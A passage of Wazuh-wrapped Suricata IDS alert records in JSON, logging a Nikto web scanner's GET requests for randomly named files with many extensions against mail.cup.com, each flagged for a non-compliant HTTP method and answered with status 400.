character","id":"86601","firedtimes":51,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.83021","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.502204+0000\",\"flow_id\":1034666195461575,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47038,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.bat\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.502204+0000","flow_id":"1034666195461575.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47038","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.bat","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.504875+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":52,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.84559","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.504875+0000\",\"flow_id\":565587047264595,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47040,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.asa\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.504875+0000","flow_id":"565587047264595.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47040","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.asa","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.506877+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":53,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.86095","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.506877+0000\",\"flow_id\":1776793594542443,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47042,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.PRINT\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.506877+0000","flow_id":"1776793594542443.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47042","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.PRINT","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.509502+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":54,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.87637","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.509502+0000\",\"flow_id\":43357678780300,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47044,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.inc\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.509502+0000","flow_id":"43357678780300.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47044","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.inc","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.511939+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":55,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.89171","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.511939+0000\",\"flow_id\":111342716111856,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47046,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.ee\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.511939+0000","flow_id":"111342716111856.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47046","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.ee","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.522439+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":56,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.90705","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.522439+0000\",\"flow_id\":22535677342666,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47048,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.gif\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.522439+0000","flow_id":"22535677342666.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47048","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.gif","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.525182+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":57,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.92239","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.525182+0000\",\"flow_id\":1801949218013082,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47050,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.tmp\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.525182+0000","flow_id":"1801949218013082.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47050","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.tmp","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.527247+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":58,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.93777","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.527247+0000\",\"flow_id\":46888141850715,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47052,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.CGI\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.527247+0000","flow_id":"46888141850715.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47052","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.CGI","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.529238+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":59,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.95311","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.529238+0000\",\"flow_id\":314112417075197,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47054,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.ASP\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.529238+0000","flow_id":"314112417075197.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47054","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.ASP","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.531898+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":60,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.96847","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.531898+0000\",\"flow_id\":484214596835423,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47056,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.cnf\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.531898+0000","flow_id":"484214596835423.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47056","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.cnf","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.534133+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":61,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.98383","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.534133+0000\",\"flow_id\":987915476410983,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47058,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.config~\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.534133+0000","flow_id":"987915476410983.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47058","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.config~","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.536596+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":62,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.99927","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.536596+0000\",\"flow_id\":830771212987548,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47060,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.vts\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.536596+0000","flow_id":"830771212987548.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47060","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.vts","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.538865+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":63,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.101463","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.538865+0000\",\"flow_id\":2145323263342098,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47062,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.bak\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.538865+0000","flow_id":"2145323263342098.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47062","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.bak","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.541676+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":64,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.103002","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.541676+0000\",\"flow_id\":2236672922763369,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47064,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.se\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.541676+0000","flow_id":"2236672922763369.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47064","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.se","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.543712+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":65,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.104539","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.543712+0000\",\"flow_id\":2.23652689387752e+15,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47066,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.js\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.543712+0000","flow_id":"2236526893877520.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47066","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.js","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.546419+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":66,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.106080","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.546419+0000\",\"flow_id\":565934939591600,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47068,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.pl\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.546419+0000","flow_id":"565934939591600.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47068","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command 